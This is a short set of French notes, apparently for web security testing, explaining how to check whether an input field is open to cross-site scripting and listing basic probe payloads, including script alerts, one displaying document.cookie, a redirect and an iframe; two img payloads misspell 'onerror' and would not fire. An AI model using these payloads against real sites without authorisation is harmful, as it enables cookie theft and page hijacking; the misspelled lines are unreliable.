Plein de payloads : https://github.com/payloadbox/xss-payload-list
<u>Test</u>
Si on visualise Test, souligné. Alors la saisie utilisateur est interprétée comme du code, il est probable que le champ de saisie soit vulnérable aux XSS.
<script>alert('XSS')</script>
<script>alert(document.cookie)</script>
<script>window.location="<https://www.google.fr>"</script>
<iframe src="<http://127.0.0.1/>"></iframe>
<img src=1 onerrror=alert('xss')>
<img src=1 onerrror=prompt('xss')>